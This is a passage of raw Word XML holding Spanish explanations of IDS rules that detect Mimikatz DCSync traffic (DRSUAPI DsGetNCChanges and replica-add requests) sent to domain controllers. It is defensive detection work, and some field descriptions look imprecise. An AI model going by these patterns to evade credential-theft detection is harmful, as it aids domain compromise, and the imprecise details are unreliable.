    <w:p w14:paraId="7304EEB3" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DsGetNCChanges Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F464017" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65157DF5" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se verifica si el flujo de bits `drsuapi` está configurado (`flowbits:isset,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E0469" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00 00` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 00|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BF2E8" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se realiza una prueba de byte para verificar si el primer byte después de la posición 4 es mayor o igual a `0x10` y menor o igual a `0x11` (`byte_test:1,&gt;=,0x10,4; byte_test:1,&lt;=,0x11,4`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2820E" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `03 00` 2 bytes después de la posición 22 (`content:"|03 00|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36340969" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559CF13" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169BBC8" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3055C41E" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65519248" w14:textId="77777777" w:rsidR="006A1DE7" w:rsidRDefault="006A1DE7" w:rsidP="006A1DE7">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C683FE1" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066773D5" w14:textId="77777777" w:rsidR="00834223" w:rsidRPr="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834223">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>5. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,&gt;=,0x00,4; byte_test:1,&lt;=,0x01,4; content:"|00 03|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000013; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D364BB" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCC362B" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla está diseñada para detectar solicitudes de cambio de nombre de contexto específicas en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E470077" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E99DD5" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4158F4F5" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DsGetNCChanges Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBA2928" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9A850" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se verifica si el flujo de bits `drsuapi` está configurado (`flowbits:isset,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AFB86" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00 00` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 00|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA02430" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se realiza una prueba de byte para verificar si el primer byte después de la posición 4 es mayor o igual a `0x00` y menor o igual a `0x01` (`byte_test:1,&gt;=,0x00,4; byte_test:1,&lt;=,0x01,4`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C991D7B" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `00 03` 2 bytes después de la posición 22 (`content:"|00 03|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090CBB93" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884993E" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7CB1F" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3837CF" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1C7FC" w14:textId="77777777" w:rsidR="00834223" w:rsidRDefault="00834223" w:rsidP="00834223">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F17FAAE" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F8C592" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRPr="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F226C2">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>6. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; byte_test:1,&gt;=,0x10,4; byte_test:1,&lt;=,0x11,4; content:"|05 00|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000015; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C03C26" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D02393" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla está diseñada para detectar solicitudes de añadir réplicas específicas en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF1607F" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060FB46B" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2389285E" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE5A2A" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7035EA0D" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se verifica si el flujo de bits `drsuapi` está configurado (`flowbits:isset,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F60EB08" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00 00` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 00|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24258AEB" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se realiza una prueba de byte para verificar si el primer byte después de la posición 4 es mayor o igual a `0x10` y menor o igual a `0x11` (`byte_test:1,&gt;=,0x10,4; byte_test:1,&lt;=,0x11,4`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F1A42" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00` 2 bytes después de la posición 22 (`content:"|05 00|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF3B5B" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584E2AE" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F91822" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301FB1E9" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE9EB5" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1600C6F1" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534885A2" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203B699A" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRPr="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F226C2">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Regla: `alert tcp $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request"; flow:established,to_server; flowbits:isset,drsuapi; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F226C2">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>content:"|05 00 00|"; depth:3; byte_test:1,&gt;=,0x00,4; byte_test:1,&lt;=,0x01,4; content:"|00 05|"; offset:22; depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000016; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224EF2F1" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CAD1A8" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta regla está diseñada para detectar solicitudes de añadir réplicas específicas en el protocolo DRSUAPI relacionadas con Mimikatz. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9E62A" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365F7B5A" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico TCP proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080BF7FA" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DRSUAPI_REPLICA_ADD Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34E1D9" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC92C3B" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se verifica si el flujo de bits `drsuapi` está configurado (`flowbits:isset,drsuapi`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2AA94" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `05 00 00` en los primeros 3 bytes del contenido del paquete (`content:"|05 00 00|"; depth:3`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2646ACC2" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se realiza una prueba de byte para verificar si el primer byte después de la posición 4 es mayor o igual a `0x00` y menor o igual a `0x01` (`byte_test:1,&gt;=,0x00,4; byte_test:1,&lt;=,0x01,4`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E62C6" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se busca la secuencia hexadecimal `00 05` 2 bytes después de la posición 22 (`content:"|00 05|"; offset:22; depth:2`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400006AB" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0CA590" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C386C90" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9B5B1" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC1800" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65BF218B" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7076CB07" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRPr="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F226C2">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>8. Regla: `alert dcerpc $WORKSTATIONS any -&gt; $DCS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; dce_iface:e3514235-4b06-11d1-ab04-00c04fc2dcd2; dce_opnum:3; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000017; rev:1;)`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857BD36" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79028938" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Esta regla está diseñada para detectar solicitudes de cambio de nombre de contexto específicas en el protocolo DRSUAPI relacionadas con Mimikatz utilizando el protocolo DCE-RPC. A continuación se detalla la explicación de la regla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715729EB" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F010E3" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla se activa cuando se detecta tráfico DCE-RPC proveniente de las estaciones de trabajo (`$WORKSTATIONS`) hacia los controladores de dominio (`$DCS`) en cualquier puerto destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC49954" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El mensaje de la regla (`msg`) es "Mimikatz DRSUAPI DsGetNCChanges Request".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043ADC39" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La regla verifica que el flujo esté establecido hacia el servidor (`flow:established,to_server`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F2CBB" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se especifica la interfaz DCE (`dce_iface`) con el valor `e3514235-4b06-11d1-ab04-00c04fc2dcd2`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403DA5A" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se especifica el número de operación DCE (`dce_opnum`) como 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC6F10" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- Se proporciona una referencia a la URL del blog didierstevens.com (`reference:url,blog.didierstevens.com`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D6D69" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La clasificación de la regla (`classtype`) es una violación de política (`policy-violation`).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B429E" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- El identificador de la regla (`sid`) es 1000017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B76969" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>- La revisión de la regla (`rev`) es 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738FBED0" w14:textId="77777777" w:rsidR="00F226C2" w:rsidRDefault="00F226C2" w:rsidP="00F226C2">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441D6323" w14:textId="77777777" w:rsidR="008838CD" w:rsidRPr="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36711D31" w14:textId="77777777" w:rsidR="008838CD" w:rsidRPr="008838CD" w:rsidRDefault="008838CD" w:rsidP="008838CD">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008838CD">
        <w:rPr>
          <w:color w:val="7030A0"/>
